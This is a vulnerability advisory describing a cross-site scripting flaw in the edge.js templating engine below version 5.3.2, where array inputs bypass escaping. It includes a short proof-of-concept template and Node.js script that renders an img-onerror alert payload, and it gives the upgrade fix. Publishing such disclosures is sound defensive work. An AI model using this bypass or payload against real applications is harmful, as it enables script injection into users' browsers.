Vulnerability	Vulnerable Version
M Cross-site Scripting (XSS) edge.js is a Node.js templating engine with fresh air. Affected versions of this package are vulnerable to Cross-site Scripting (XSS). A type confusion vulnerability can be used to bypass input sanitization when the input to be rendered is an array (instead of a string or a `SafeValue`), even if `{{ }}` are used. PoC - create the following file (welcome.edge) under the views folder: <p> {{ greeting }} </p> - run the following code: const { join } = require('path') const edge = require('edge.js').default edge.mount(join(__dirname, 'views')) edge.render('welcome', { greeting: "<img src=x onerror='alert(1)' />" }).then(html => console.log(html)) // <p> <img src=x onerror='alert(1)' /> </p> edge.render('welcome', { greeting: ["<img src=x onerror='alert(2)' />"] }).then(html => console.log(html)) // <p> <img src=x onerror='alert(2)' /> </p> How to fix Cross-site Scripting (XSS)? Upgrade `edge.js` to version 5.3.2 or higher.	<5.3.2

Cross-site Scripting (XSS)

edge.js is a Node.js templating engine with fresh air.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). A type confusion vulnerability can be used to bypass input sanitization when the input to be rendered is an array (instead of a string or a SafeValue), even if {{ }} are used.

PoC

- create the following file (welcome.edge) under the views folder:
<p> {{ greeting }} </p>

- run the following code:
const { join } = require('path')

const edge = require('edge.js').default

edge.mount(join(__dirname, 'views'))

edge.render('welcome', {
  greeting: "<img src=x onerror='alert(1)' />"
}).then(html => console.log(html)) // <p> &lt;img src=x onerror=&#x27;alert(1)&#x27; /&gt; </p>

edge.render('welcome', {
    greeting: ["<img src=x onerror='alert(2)' />"]
  }).then(html => console.log(html)) // <p> <img src=x onerror='alert(2)' /> </p>

How to fix Cross-site Scripting (XSS)?

Upgrade edge.js to version 5.3.2 or higher.

<5.3.2

Go back to all versions of this package